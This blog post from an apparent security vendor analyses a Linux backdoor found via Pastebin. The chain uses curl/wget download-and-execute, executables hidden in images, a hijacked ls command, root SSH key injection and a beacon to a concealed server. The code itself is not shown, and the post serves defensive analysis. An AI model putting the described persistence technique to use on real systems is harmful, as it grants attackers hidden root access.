A Pastebin scraper, steganography, and a persistent Linux backdoor

One great thing about working in information security is that there is no normal. We routinely encounter strange and novel things, and that’s exactly what turned up after some roving on Pastebin over the last few weeks.

As a bit of context, it’s pretty routine for adversaries to host shells, executables, and other attack infrastructure on Pastebin. If you scrape the site for the right indicators or patterns, then you’re bound to find something. Of course, a lot of the attack tooling on Pastebin is pretty mundane, but sometimes—if you’re willing to examine a long and convoluted sequence of scripts—you can find a persistent Linux backdoor concealing itself with steganography.

Let’s start at the beginning

I ran some Pastebin searches for evidence of a classic shell trick—where adversaries use curl or wget to download and execute a later-stage payload—and they yielded seemingly negligible results:

However, since it would only take a minute to see if the download was available, it made sense to check. Of course, it was available, and what followed was ultimately fascinating.

Here’s what turned up

Take a look at line 12:

While not a completely new idea, it’s certainly unusual to see this use of the Unix dd command. Normally, dd is used to copy and convert data. Security professionals will often encounter it when making forensic disk copies and overwriting data. In this case, it looked like they were using dd with the skip option to extract an executable from an image, suggesting that this wasn’t your everyday bash shell malware.

Now we follow the breadcrumbs

Luckily, the website hosting the image hadn’t been taken down, and I was able to retrieve it (see below). Even better yet, the image was still concealing the executable, and a Google search for the image turned up no matches.

The dd command worked as expected, and, upon extraction, revealed an executable program named rcu_bh. By using the file command, it turned out that the extracted program was an executable and linking format (ELF) binary—which is basically the Linux equivalent of Windows’ portable executable (PE) binary format.

At the time, no one had uploaded the file to VirusTotal, where zero out of 59 anti-malware engines marked it as malicious. As of this writing, it has the same score. VirusTotal did note that it was issuing a curl command to Pastebin—but nothing else. The Hybrid-Analysis sandbox system also failed to find anything interesting about the file, determining that it posed “No Specific Threat.”

Beyond sandboxes and malware repositories

At this point, regular text-based analysis was going nowhere, and VirusTotal and Hybrid-Analysis failed to report back the presence of any malicious activity. The logical next step was to carry out a deeper analysis by executing the binary in an isolated and instrumented virtual machine, which ultimately revealed its purpose: to download and execute another script from Pastebin.

This follow-on script executed a command that was identical to the first command shown in this report, only with a different target URL on Pastebin.

What’s going on at this URL?

Let’s break this down a bit because there’s some interesting stuff going on here. First, the script ensures that there’s a copy of /tmp available (see line four), suggesting that the attack requires root-level access, since root privileges are typically required to create a directory in /. Then, starting at line seven, it checks for the presence of an unusual file that wouldn’t normally show up on a Linux system: lsx. If that program is indeed on the system, the attackers run it and leave.

However, if lsx isn’t already installed on the system, the attackers carry out the following actions:

Try to install git
Try to install gcc (the compiler for C)
Download another, different image (from the same location as before)
Extract a program from the image via dd and execute it (same as before)
Run lsx (which suggests that lsx is supposed to be installed by the program that is run in step four)
Clean-up and exit.

But wait, there’s more!

The second image ended up looking identical to the first, and the program it extracted was a 64-bit ELF executable. Yet again, zero antivirus vendors marked it as malicious on VirusTotal, and the behavioral analysis report showed some git-related activity—but nothing significant beyond that. So once more we needed to execute the program in a controlled environment. This time, instead of getting the program to run from Pastebin, or extracting it from an image, it used git to clone a code repository and execute a script from the resulting directory tree. Specifically, it executed the following command:

Well, now we know why the previous script was trying to install git. Here we see init.sh, which goes on to performs a variety of functions, which we’re about to break down.

First it locates this ls program, then it invokes a new Python script (cpl.py) in that location. Most of the contents of the Python script are dead code or Chinese-language notes, so we only need to examine a few pieces of it:

This routine takes the ls command that was located by the init.sh script, and renames it to ls.—note that the period on the end is part of the file’s new name.

It also creates a file in /etc named systs.conf, a perfectly plausible name for a file in /etc, but not a legitimate configuration file. Next, the program writes a dictionary array (formatted as json) with a number and a date to that file.

And we can see here where cpl.py runs and executes those two routines.

However there is another bit of init.sh that we need to look at:

Now the ls command is being replaced by the following shell script: ls.sh. Naturally, we need to see what ls.sh does.

So ls was replaced by a shell script that invokes the original ls (remember: in cpl.py, ls was renamed to ls.). In addition, the script passes to ls. all the arguments that it was originally invoked with (”$@” expands to all the arguments that the script was invoked with). After the script has run the original ls, (aka ls.), the script then runs some other program named lsx. In other words, the script executes the legitimate copy of ls in the way the user invoking the script will expect the real ls utility to run. The unexpected part is the extra execution of lsx.

The plot thickens

The following piece of init.sh is the next important thing we need to examine:

And now we know why gcc was installed earlier. The init.sh script compiles the C program x.c and creates an executable program named lsx. Then lsx is copied to the directory where ls lives—effectively allowing the shell script ls.sh, which is replacing the ls command, to run lsx after running the real ls (which had been renamed to ls.).

Let’s look at the x.c program:

In essence, lsx invokes a Python program named key, and this brings us back to init.sh for one last important detail:

This merely installs key.py—and some auxiliary python code—in the system Python library. Since it’s in the syskey directory, the easiest way to refer to key.py is to treat it as a part of the syskey module (e.g. syskey.key as we saw in the x.c program).

This seems like a lot effort for someone who is simply trying to run key.py every time ls runs.

Making it worth the wait

VirusTotal had not seen key.py before, and zero of 58 antivirus engines are currently alerting on it.

We’ll examine key.py in reorganized pieces in order to clearly explain what it’s up to.

Well, now we’re getting an idea of what the /etc/systs.conf file is for. The variable ts ends up getting the date stored as start in that file, represented as the number of seconds since the epoch. time.time() is the current time, represented as seconds since the epoch. In the if block, we can see that if the current date is before the time stored in /etc/systs.conf, then this function simply returns without doing anything. Otherwise, the variable latency_time is set to the value of the delay value stored in /etc/systs.conf and execution continues in this function. This would appear to prevent the program from running before some start date.

In the sample I have, that start date is 2018-01-01, so the program is currently free to run. This could serve to prevent execution prior to some start date. It could also function as a type of kill switch, by specifying a date far in the future.

Here’s the other piece of the latency_time mechanism:

This routine (is_running) uses the file /tmp/sys.ts to track the last time this program was run. If the program was run less than latency_time seconds ago, it returns True. Otherwise it writes the current time (in seconds since the epoch) to that file and returns False. This routine is used as a check to ensure that key.py isn’t run too often—by causing key.py to abort if it has been run less than latency_time seconds ago.

As you can see, there’s more going on in check():

This is interesting because there is a saved SSH authentication public key in the variable b.

And in the above image you can see that the authentication key is being added to the root account’s authorized_keys file and ensuring that that SSH is running. At this point, anybody with knowledge of the corresponding SSH private key can login to the root account over SSH.

Finally, it’s clear what all this effort was for: to provide persistent, root-level access. Every time root on this computer runs the ‘ls’ command, the program ‘key.py’ will be run by root and reinstall this backdoor to the root account.

But wait again… there’s still more!

After decoding and decompressing, the string in url, the variable in u contains the following string:

The platform.platform() call returns the version of the operating system running.

This all means that after the u.strip(‘www.qq.com’) is run, this program will connect to a web server whose name is hidden by base64 encoding, compressed, embedded within distractor hostnames. When it connects to the web server, in addition to providing its IP address simply by connecting, it will upload details about what operating system is running (on the computer that just had a root back-door installed on it) to the server.

Tying up the loose ends

The routine check() does the bulk of the work for key.py. When check() exits, one of the following happens:

The authorized_keys for the root account has the key installed, which give the attacker root access via SSH
SSH is already running
A connection has been made to the attacker’s website, notifying them that this machine has the backdoor installed and what operating system the machine running

Alternatively, the latency_time check might have failed, meaning that the machine is already compromised, and it’s too soon to run this program again. It’s also possible that the current date is before the start time, which would prevent the program from running altogether.

In summary

It’s easy to get lost in this admittedly convoluted maze of scripts, so here’s the high level version:

An already compromised machine downloads and executes a one-line script from Pastebin
That one-line script downloads and executes a more complex script from Pastebin
The more complex script downloads a .png file from a Chinese host, extracts a hidden executable (rcu_bh), and runs it
rcu_bh downloads and executes yet another one-line script from Pastebin
Again, the one-line script downloads and executes a more complex script from Pastebin
The more complex script downloads a different .png, extracts another hidden executable (rcu_gp), and runs it
rcu_gp performs a git clone from a Chinese site, effectively downloading a directory tree, and executes a bash script (init.sh) in that downloaded directory tree
The bash script then coordinates the replacement of the standard Unix ls command with a script that will run the original ls command, before running a malicious Python script named key.py. It also installs a file in /etc, which controls when and how often this malware will run.
The malicious Python script (key.py) modifies the root account’s authorized_keys file, effectively providing a backdoor to the root account via SSH. It also contacts a remote server, notifying it that the backdoor has been successfully installed on local machine, and providing information about the operating system it’s running.

Closing Thoughts

Attempts to connect to the web server in the post_info() routine returned an HTTP “500 Internal Server Error.” Further, while running this program, there weren’t any subsequent SSH connections trying to access the root account. This could mean that the server has already been taken down, or perhaps it has not entered production yet.

This tooling is all about establishing persistence on an already compromised machine. It requires root access to run. Once an attacker has root, downloading and running the initial script is trivial. The names of the two executable programs, rcu_bh and rcu_gp, are the same as standard parts of the Linux operating system, which is pretty clearly an attempt at defense evasion.

I’ve obscured many of the details here since all the links are still live and dangerous. It appears likely that the shc shell script compiler was used to generate the two executables. This conclusion is based on some of the dead code in the scripts, files found in the downloaded git repository, and the behavior of the two executables.

Look beyond processes with Linux EDR

Linux security

Resources • Blog Linux security

A Pastebin scraper, steganography, and a persistent Linux backdoor

Del Armstrong•

Let’s start at the beginning

Here’s what turned up

Now we follow the breadcrumbs

Beyond sandboxes and malware repositories

What’s going on at this URL?

But wait, there’s more!

The plot thickens

Making it worth the wait

But wait again… there’s still more!

Tying up the loose ends

In summary

Closing Thoughts

Related Articles

Look beyond processes with Linux EDR

Contain yourself: An intro to Linux EDR

eBPFmon: A new tool for exploring and interacting with eBPF applications

eBPF: A new frontier for malware

Subscribe to our blog

See what it's like to have a security ally.

Experience the difference between a sense of security and actual security.